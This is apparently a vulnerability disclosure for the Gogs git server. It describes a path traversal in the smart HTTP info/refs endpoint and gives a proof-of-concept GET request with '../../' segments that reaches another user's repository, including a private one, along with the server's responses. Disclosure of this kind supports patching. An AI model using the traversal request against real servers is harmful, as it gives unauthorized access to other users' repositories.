Summary

It seems “gogs” suffers from a Path Traversal which may lead a malicious user to access another legitimate user’s git config files or issue a couple of git commands on its behalf.

Steps to reproduce and Proof of Concept

1. I created two users sim4n6 and sim4n62.
2. From sim4n6 dashboard added test2 repository. And, from sim4n62 I added a tests repository.
3. Initiate the following GET request (PoC) using sim4n6 authentication cookies.

GET /sim4n6/test2/../../sim4n62/tests/info/refs?service=git-receive-pack HTTP/1.1
Host: localhost:10880
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: <deleted>

You will get a 200 OK status code:

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Content-Type: application/x-git-receive-pack-advertisement
Expires: Fri, 01 Jan 1980 00:00:00 GMT
Pragma: no-cache
Date: Thu, 02 Jun 2022 23:16:27 GMT
Content-Length: 216
Connection: close

001f# service=git-receive-pack
000000b10000000000000000000000000000000000000000 capabilities^{}

While in the normal (not malicious) case, sim4n6 can initiate the following GET request:

GET /sim4n6/test2/info/refs?service=git-receive-pack HTTP/1.1
Host: localhost:10880

<deleted for brievety>

and get the following HTTP response:

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Content-Type: application/x-git-receive-pack-advertisement
Expires: Fri, 01 Jan 1980 00:00:00 GMT
Pragma: no-cache
Date: Thu, 02 Jun 2022 23:23:22 GMT
Content-Length: 218
Connection: close

001f# service=git-receive-pack
000000b3da9a744ed8f8d6883ca93758f3900028e61e9ad4 refs/heads/master

Even if the sim4n62’s repository is private, the same thing happens.